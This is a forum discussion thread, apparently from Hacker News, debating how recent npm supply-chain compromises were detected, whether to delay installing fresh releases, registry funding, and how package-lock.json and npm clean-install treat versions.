The CEO of socket.dev described an automated pipeline flagging new uploads for analysts, for example, which is good but not instantaneous:
https://www.hackerneue.com/item?id=45257681
The Aikido team also appear to be suggesting they investigated a suspicious flag (apologies if I’m misreading their post), which again needs time for analysts to work:
https://www.aikido.dev/blog/npm-debug-and-chalk-packages-com...
My thought was simply that these were caught relatively quickly by security researchers rather than by compromised users reporting breaches. If you didn’t install updates with a relatively short period of time after they were published, the subsequent response would keep you safe. Obviously that’s not perfect and a sophisticated, patient attack like liblzma suffered would likely still be possible but there really does seem to be a value to having something like Debian’s unstable/stable divide where researchers and thrill-seekers would get everything ASAP but most people would give it some time to be tested. What I’d really like to see is a community model for funding that and especially supporting independent researchers.
I mean I'd prolly be okay paying yearly fee for access to such a registry.
More seriously, automated scanners seem to do a good job already of finding malicious packages. It's a wonder that npm themselves haven't already deployed an automated countermeasure.
That's not true. This latest incident was detected by an individual researcher, just like many similar attacks in the past. Time and again, it's been people who flagged these issues, later reported to security startups, not automated tools. Don't fall for the PR spin.
If automated scanning were truly effective, we'd see deployments across all major package registries. The reality is, these systems still miss what vigilant humans catch.
So that still seems fine? Presumably researchers are focusing on latest releases, and so their work would not be impacted by other people using this new pnpm option.
No we wouldn't. Most package registries are run by either bigcorps at a loss or by community maintainers (with bigcorps again sponsoring the infrastructure).
And many of them barely go beyond the "CRUD" of package publishing due to lack of resources. The economic incentives of building up supply chain security tools into the package registries themselves are just not there.
This distinction matters. Malware detection is, in the general case, an undecidable problem (think halting problem and Rice theorem). No amount of static or dynamic scanning can guarantee catching malicious logic in arbitrary code. At best, scanners detect known signatures, patterns, or anomalies. They can't prove absence of malicious behavior.
So the reality is: if Google's assurance artifacts stop short of claiming automated malware detection is feasible, it's a stretch for anyone else to suggest registries could achieve it "if they just had more resources." The problem space itself is the blocker, not just lack of infra or resources.
I think this sort of thought process is misguided.
We do see continuous, ecosystem-wide scanning and detection pipelines. For example, GitHub does support DependaBot, which runs supply chain checks.
What you don't see is magical rabbits being pulled out of top hats. The industry has decades of experience with anti-malware tools in contexts where said malware runs in spite of not being explicitly provided deployment or execution permissions. And yet it deploys and runs. What do you expect if you make code intentionally installable and deployable, and capable of sending HTTP requests to send and receive any kind of data?
Contrary to what you are implying, this is not a simple problem with straight-forward solutions. The security model has been highly reliant on the role of gatekeepers, both in producer and consumer sides. However, the last batch of popular supply chain attacks circumvented the only failsafe in place. Beyond this point, you just have a module that runs unspecified code, just like any other module.
> It started with a cryptic build failure in our CI/CD pipeline, which my colleague noticed
> This seemingly minor error was the first sign of a sophisticated supply chain attack. We traced the failure to a small dependency, error-ex. Our package-lock.json specified the stable version 1.3.2 or newer, so it installed the latest version 1.3.3, which got published just a few minutes earlier.
Is that possible? I thought the lock files restricted to a specific version with an integrity check hash. Is it possible that it would install a newer version which doesn't match the hash in the lock file? Do they just mean package.json here?
> Do they just mean package.json here?
Yes, most likely. A package-lock.json always specifies an exact version with hash and not a "version X or newer".
This comes up every time npm install is discussed. Yes, npm install will "ignore" your lockfile and install the latest dependancies it can that satisfy the constraints of your package.json. Yes, you should use npm clean-install. One shortcoming is the implementation insists on deleteing the entire node_modules folder, so package installs can actually take quite a bit of time, even when all the packages are being served from the npm disk cache: https://github.com/npm/cli/issues/564
[1] https://blogs.microsoft.com/blog/2024/05/03/prioritizing-sec...
2) Real chances for owners to notice they have been compromised
3) Adopt early before that commons is fully tragedy-ed.